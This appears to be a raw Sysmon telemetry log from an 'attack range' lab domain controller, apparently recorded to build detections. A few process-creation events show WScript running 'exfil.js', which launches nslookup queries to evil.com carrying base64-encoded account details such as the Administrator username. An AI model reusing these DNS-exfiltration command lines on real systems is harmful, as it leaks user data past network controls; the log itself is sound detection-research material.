4d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215385Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.553{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215384Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.553{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18FE-629A-4146-000000005F02}7780C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215383Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.553{2E1864BB-18FE-629A-3F46-000000005F02}32126076C:\Windows\system32\cmd.exe{2E1864BB-18FE-629A-4146-000000005F02}7780C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000215382Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.566{2E1864BB-18FE-629A-4146-000000005F02}7780C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18FE-629A-3F46-000000005F02}3212C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlrhgdyb.tmp 2>&1 10341000x8000000000000000215381Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.537{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18FE-629A-4046-000000005F02}7444C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215380Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.537{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18FE-629A-4046-000000005F02}7444C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215379Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.537{2E1864BB-18FE-629A-4046-000000005F02}74443336C:\Windows\system32\conhost.exe{2E1864BB-18FE-629A-3F46-000000005F02}3212C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215378Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.506{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18FE-629A-4046-000000005F02}7444C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215377Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.506{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215376Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.506{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215375Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.506{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215374Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.506{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215373Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.506{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18FE-629A-3F46-000000005F02}3212C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215372Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.506{2E1864BB-18E0-629A-6742-000000005F02}3976488C:\Windows\System32\WScript.exe{2E1864BB-18FE-629A-3F46-000000005F02}3212C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000215371Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.505{2E1864BB-18FE-629A-3F46-000000005F02}3212C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlrhgdyb.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000215370Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.501{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlcvm.tmpMD5=FA64F29A2105005DB944F49BBF99C790,SHA256=AFC24D0EC0C7AAB04F6CC9902001B05F5184E11791617287F2A4C4C94A76A48D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000215369Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.453{2E1864BB-18FE-629A-3D46-000000005F02}69607432C:\Windows\system32\conhost.exe{2E1864BB-18FE-629A-3E46-000000005F02}7904C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215368Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.453{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215367Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.453{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215366Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.453{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215365Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.453{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215364Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.453{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18FE-629A-3E46-000000005F02}7904C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215363Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.453{2E1864BB-18FE-629A-3C46-000000005F02}79406124C:\Windows\system32\cmd.exe{2E1864BB-18FE-629A-3E46-000000005F02}7904C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000215362Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.456{2E1864BB-18FE-629A-3E46-000000005F02}7904C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IEFkbWluaXN0cmF0b3I= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18FE-629A-3C46-000000005F02}7940C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IEFkbWluaXN0cmF0b3I= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlcvm.tmp 2>&1 354300x8000000000000000215361Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.957{00000000-0000-0000-0000-000000000000}2568<unknown process>-udpfalsefalse127.0.0.1-51286-false127.0.0.1-53domain 354300x8000000000000000215360Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.957{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51286- 354300x8000000000000000215359Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.957{00000000-0000-0000-0000-000000000000}2568<unknown process>-udptruefalse127.0.0.1-51286-false127.0.0.1-53domain 354300x8000000000000000215358Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.864{00000000-0000-0000-0000-000000000000}32<unknown process>-udpfalsefalse127.0.0.1-51285-false127.0.0.1-53domain 354300x8000000000000000215357Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.864{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51285- 354300x8000000000000000215356Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.864{00000000-0000-0000-0000-000000000000}32<unknown process>-udptruefalse127.0.0.1-51285-false127.0.0.1-53domain 354300x8000000000000000215355Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.864{00000000-0000-0000-0000-000000000000}32<unknown process>-udpfalsefalse127.0.0.1-51284-false127.0.0.1-53domain 354300x8000000000000000215354Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.864{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51284- 354300x8000000000000000215353Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.864{00000000-0000-0000-0000-000000000000}32<unknown process>-udptruefalse127.0.0.1-51284-false127.0.0.1-53domain 354300x8000000000000000215352Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.864{00000000-0000-0000-0000-000000000000}32<unknown process>-udpfalsefalse127.0.0.1-51283-false127.0.0.1-53domain 354300x8000000000000000215351Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.863{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51283- 354300x8000000000000000215350Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.863{00000000-0000-0000-0000-000000000000}32<unknown process>-udptruefalse127.0.0.1-51283-false127.0.0.1-53domain 354300x8000000000000000215349Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.809{2E1864BB-E1C6-6299-D800-000000005F02}3988C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local56429-false10.0.1.12-8000- 354300x8000000000000000215348Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.801{00000000-0000-0000-0000-000000000000}5708<unknown process>-udpfalsefalse127.0.0.1-51282-false127.0.0.1-53domain 354300x8000000000000000215347Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.801{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51282- 354300x8000000000000000215346Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.801{00000000-0000-0000-0000-000000000000}5708<unknown process>-udptruefalse127.0.0.1-51282-false127.0.0.1-53domain 354300x8000000000000000215345Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.801{00000000-0000-0000-0000-000000000000}5708<unknown process>-udpfalsefalse127.0.0.1-51281-false127.0.0.1-53domain 354300x8000000000000000215344Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.801{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51281- 354300x8000000000000000215343Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.801{00000000-0000-0000-0000-000000000000}5708<unknown process>-udptruefalse127.0.0.1-51281-false127.0.0.1-53domain 354300x8000000000000000215342Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.800{00000000-0000-0000-0000-000000000000}5708<unknown process>-udpfalsefalse127.0.0.1-51280-false127.0.0.1-53domain 354300x8000000000000000215341Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.800{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51280- 354300x8000000000000000215340Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.800{00000000-0000-0000-0000-000000000000}5708<unknown process>-udptruefalse127.0.0.1-51280-false127.0.0.1-53domain 354300x8000000000000000215339Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.741{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51279- 354300x8000000000000000215338Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.741{00000000-0000-0000-0000-000000000000}984<unknown process>-udptruefalse127.0.0.1-51279-false127.0.0.1-53domain 354300x8000000000000000215337Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.741{00000000-0000-0000-0000-000000000000}984<unknown process>-udpfalsefalse127.0.0.1-51278-false127.0.0.1-53domain 354300x8000000000000000215336Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.741{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51278- 